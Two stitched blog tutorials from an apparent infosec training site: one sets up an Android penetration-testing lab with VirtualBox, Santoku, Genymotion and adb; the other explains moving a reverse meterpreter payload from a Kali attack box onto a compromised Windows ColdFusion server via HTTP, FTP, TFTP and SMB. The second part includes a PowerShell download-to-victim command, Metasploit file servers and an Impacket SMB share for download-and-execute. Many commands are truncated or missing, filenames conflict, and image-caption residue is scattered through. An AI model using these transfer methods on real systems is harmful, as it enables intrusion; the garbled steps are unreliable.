How Can a Penetration Testing Lab Be Built For Android?

Concepts we need to understand first of all: Penetration Testing

  • Penetration Testing:

It is highly probable that you have heard of penetration testing at some point while investigating the topic of computer security. Or maybe you have worked on penetration testing against a web application or another system or computer network.

So what is meant by penetration testing in the first place? Well, in fact, it refers to the process of searching for vulnerabilities in a specific system. In the meanwhile, the information of a targeted system is collected in order for a pen tester to grasp what entry points could be exploited. Then, an actual exploitation or sometimes a virtual one is carried out. Accordingly, conclusions are drawn out from such testing on vulnerabilities to report how much such system is secured.

Pen testers are usually referred to as white hat attackers since they try to break the system which is tested.

  • Android Platforms:

It comes as no surprise that every single person on earth is familiar with the word Android and realizes that it is an operating system for mobile devices in the first place.

However, what we are interested more in finding out the basics or fundamentals of such operating system; where does it come from and from which operating system was it originated? In fact, the Linux Kernel was where it all started for the sake of reaching a dependable operating system working well on mobile devices and tablets.

It has become now a very commonly effective operating system. There exists the Android Open Source Project (AOSP) which is basically an open project where several developers and geek guys cooperate to develop new features.

  • Virtual Machines:

One concept that any computer enthusiastic has got to know very well and understand its meaning is the notion of virtualization. Physical computers or servers are no longer appropriate for companies who struggle to find a place in their data centers to add new physical machines.

On the other hand, home users find it very hard to work on two, three, or even more operating systems and build connections with them. It is either one will have to buy several physicals, actual computers to install on whichever operating system desired. Or the other option is to have a comparably good computer with great Read-Only Memory (RAM) size and Hard Disk as well. Then, such resources shall be distributed amongst the “virtual” machines which are to exist on the same host “physical” machine.

An example of full virtualization virtual machines is Hypervisor. It is where the virtual machines are linked in a way or another direction towards the hardware of the computer device.

Whilst, operating-system-level virtualization is where virtual machines require an operating system to work on. Thereby, the virtual machines are linked to the hardware through such operating system in the middle. For instance, Virtual Box and Virtual Machine Workstation (VM Workstation) are two programs which work for this type of virtualization.

What types of software will be used for the process?
  1. Virtual Box:

It is for the virtualization purposes to construct the lab as explained before.

  1. Santoku OS:

It is an operating system which already offers preinstalled Software Development Kits (SDKs). It is actually specialized in the deeds of forensics investigations and penetration testing.

  1. GenyMotion:

It is very important for the sake of creating Android Virtual Device (AVD)

  1. InsecureBankv2:

It is an android app which is vulnerable. It will help us begin the actual penetration testing in our created lab.

A detailed guide towards penetration testing for Android

In order for us to accomplish our ultimate goal, we will have to walk through three main steps.

  1. Download Santoku OS:
    1. As mentioned before, such software is intended for penetration testing purposes since it has pre-installed SDKs.
    2. Plenty of forensics tools are offered by this operating system like firmware flashing tools for multiple vendors.
    3. App details could be also enumerated via various forensics scripts offered there.
  2. Install Virtual Box or VM Work Station:
    1. Throughout this tutorial, I will be using Virtual Box. However, you could also use VM Work Station for the same purpose.
    2. First, get Virtual Box opened and start a new machine which you shall create specifically for Santoku OS.                   Penetration Testing
    3. Choose the desired RAM size dedicated for this newly created virtual machine. While it is recommended that 786MB shall be the size, making it larger to reach 2GB, for example, is okay                                                                                                                          Penetration Testing
    4. The option VMDK (Virtual Machine Disk) is really the option which you should go forPenetration Testing
    5. Now, specify the desired hard disk size for needed purposes afterward.Penetration Testing
    6. Now, install Santoku on the assigned virtual machine. This could be simply done by a right click on this virtual machine. Then inside the option Storage, “empty disk” shall be chosen after the disk icon in front of the optical drive is clicked on. Santoku iso file should be selected for installation now                Penetration Testing
    7. Run the virtual machine, allowing Santoku to begin its boot menu and the option “Install – start the installer directly” should be chosen.Penetration Testing
    8. Walk through the installation process and choose your preferred language.Penetration TestingPenetration TestingPenetration TestingPenetration TestingPenetration TestingPenetration Testing
  1. Get Genymotion downloaded and installed:
    1. The Android operating system could be experienced through such software where application testing is aided by OpenGL hardware acceleration.
    2. Download Genymotion, and after it gets installed, browse into
    3. A free account should be created there for verification and then log in the downloaded Gebymotion on the virtual machine.Penetration Testing
    4. Get the AVD created through clicking “Add” and select a preferred software version and brand type as per your desired task or preference.Penetration Testing
    5. Get your choices reviewed and confirmed thereafter. The virtual smart phone is created at this very point.Penetration Testing
    6. Data will start to get downloaded on the virtual devicePenetration Testing
    7. Choose the desired device to work on. You will have a bunch of options in case you added more than one device type. It will launch a similar thing to what is shown in the very following image.Penetration Testing
  1. Get Santoku connected to the virtual device now for the sake of using its SDKs afterward:
    1. Know which IP the virtual device has.Penetration Testing
    2. Get the command line opened in Santoku
    3. The following command should be typed adb connect <IP of Android Virtual Device>
    4. Make sure the device is connected through the command adb devicesPenetration Testing
    5. The virtual android device could be accessed for penetration now via opening a shell with a command adb shell

Try Certified Ethical Hacker for FREE!!!



Join the infosec family! Your journey starts here. The free tier gives you limited access to our training materials.
Regular use
This is the second tier that includes limited access to our training materials and to our exclusive lab.  
Risky use
This third tier gives you all the luxuries of the Free use and more. You have access to self-paced classes.  
Monthly use
This last tier gives you the Free, Social and Problem use for just $89 a month. Plus you will save $29!!!  

Transfer Files from Linux to Windows(After Exploit)

Sometimes we need to copy a payload or a tool from a Kali Linux attack box, an advanced Linux distribution used for penetration testing, into a compromised windows machine. But how could this be done? In order to elaborate on this idea, I will first start with an example in this regard.

A ColdFusion Server was found vulnerable, and a ColdFusion Markup (CFM) web shell payload was to be applied. Imagine you are able to hide or veil this payload, yet since you are using a Kali Linux attack box, you are really in need of a way to transfer a reverse meterpreter binary, for the sake of further control and access, from the Linux machine to the Windows Server running ColdFusion. How could this be possible?

I decided to write this article to make it easy for anyone facing the same issue. In the following lines, I will walk through 4 main methods to be utilized to transfer such files: Hypertext Transfer Protocol (HTTP), File Transfer Protocol (FTP), Trivial File Transfer Protocol (TFTP), and Server Message Block (SMB). Assume that for all the following methods, the copied files are called met8888.exe, and its location is:  /root/shells and “jarrieta” is the username used


There are in fact two ways to manipulate using HTTP. It is either you have access to the desktop, and hence you will be able to download the files if you can open the browser, or you do not have access to the desktop and then you will use the command line. Two steps are to be followed in this process:

  1. Start the server:

The first step we need to make the files inside the current directory to become available and accessible over HTTP. To serve a file from Kali over HTTP, we can use Apache, which is fundamentally installed in Kali by default, or we can use a Python HTTP Server.

  • Using Apache:
    • Copy the file to /var/www/html
    • Make the Apache Service get enabledKali Linux
  • Using Python HTTP Server:
    • Type the following line of code inside the shell in order to open the Python web server directly in it:

python -m SimpleHTTPServer

  • Choose the port number; if you skip this stem, it will serve on port 8000 by default.Kali Linux

Press CTRL-C to kill the server when this step gets finished.

  1. Download the Files:

  • First Option: Desktop is accessible:
    • Visit the following link through the browser:Kali Linux

http://YOUR-KALI-IP/shell8888.exe ; i.e:

  • Download the files through the browser
  • Second Option: You cannot access Desktop (Using command Line):
    • Open the ordinary “Command Prompt”
    • Type the following command which utilizes the PowerShell’s WebClient object (:

(new-object System.Net.WebClient).DownloadFile(‘’,’C:\Users\jarrieta\Desktop\met888.exe’)

Kali Linux


This is considered another good method to go for since there is a built in FTP client inside Windows: C:\Windows\System32\ftp.exe

This method supports mutual file transfer; in other words, it allows its user to transfer files from Kali to Windows and vice versa. This aspect is not supported through HTTP. Two steps are to be followed in this process:

  1. Start the server:

In fact, there are three options to choose from when serving files through FTP:

  • First option: install vsftpd inside Kali, which will work as a full-featured FTP. You will have it still installed even after you transfer the files unless you uninstall it later on.
  • Second option: Using Python FTP server
    • Type the following command into the shell to install the FTP module:

apt-get install python-pyftpdlib

  • Now type:

python -m pyftpdlib

  • Choose the port number; if you skip this stem, it will serve on port 2121 by default.
  • Add the -w flag to allow the write access to an anonymous user.kali linux
  • Third Option: Using Metasploit: For more details on Metasploit, kindly refer to the article titled “What is Metasploit?
    • Go to the location:


  • Choose FTP to the directory inside which resides the files to be shared using the following line:

FTPROOT /root/shells

  • Run exploit
  • Type jobs -k <id>when you need to kill the serverKali Linux
  1. Download the Files:

This step is pretty straightforward since there is a built in FTP client inside Windows. We do it in the following steps:

  • Open the FTP prompt
  • Open an FTP connection:


  • Enter the user name “anonymous” and type any password for authentication stage
  • Download the files directly through the following commandsKali Linux
  • You can alternatively create a text file and name it “ftp_commands.txt” for example and include all the required answers inside it as text:
  • Kali Linux
  • Two line commands for doing all the aforementioned steps would be in this case to download the file:



Kali Linux

Kali Linux

  • In order to get this file, there are two methods to select one of them. Both methods are illustrated in the following two pictures.


New versions of Windows do not have tftp client installed, therefore it is required to enable it first using the following command:

pkgmgr /iu:”TFTP”

Once it gets installed or if it is already installed: it takes also two steps for the process.

  1. Start the server:

There are two options:

  • Using Kali: service atftpd start

Although it is simple, it takes a lot of time.

  • Using Metasploit:
    • Go to location:


  • Choose TFTP to the directory inside which resides the files to be shared using the following line:

TFTPROOT /root/shells

Kali Linux

  • Run exploit
  1. Download the Files:

  • Open the command prompt
  • Use the -i flag and then GET action:Kali Linux
  • Use the PUT action to extract filesKali Linux
  • Files will be saved by default in/tmp


This method is convenient since SMB is built into Windows, and no special commands are needed for the computer to understand Unified Naming Convention (UNC) paths. This way, you can use only one command to download and execute a payload. Two steps are required for the process:

  1. Start the server:

One way to do this is to install the Samba File server on Linux, which will take a lot of time which we are not really in need of. However, the simple method is using Python through the following steps:

  • Enter pywhich is a part of a project called Impacket
  • Specify a share name and the path you want to share:
  • For example, we can use the following command:

python ROPNOP /root/shells

Kali Linux

  • By default, the server will be up on port 445 and then any hashed challenge responses for any system connecting to the server will be printed out on the screen.
  • To confirm the past step in Linux we use smbclient, and in windows, we use the net view. The following two images illustrate this point.Kali Linux

Kali Linux

  1. Copy/ Execute the Files:

  • Open the command prompt
  • Treat the shared name ROPNOP as a local folder, and it is allowed to use commands like commands like dir, copy, move.Kali Linux
  • Use the command copyKali Linux
  • We could skip the last two steps, and just run the file inside the shared “local folder.”

Try Certified Ethical Hacker for FREE!!!


Finally, take some time and look at my other article on Bypassing a Windows AppLocker.

Join the infosec family! Your journey starts here. The free tier gives you limited access to our training materials.
Regular use
This is the second tier that includes limited access to our training materials and to our exclusive lab.  
Risky use
This third tier gives you all the luxuries of the Free use and more. You have access to self-paced classes.  
Monthly use
This last tier gives you the Free, Social and Problem use for just $89 a month. Plus you will save $29!!!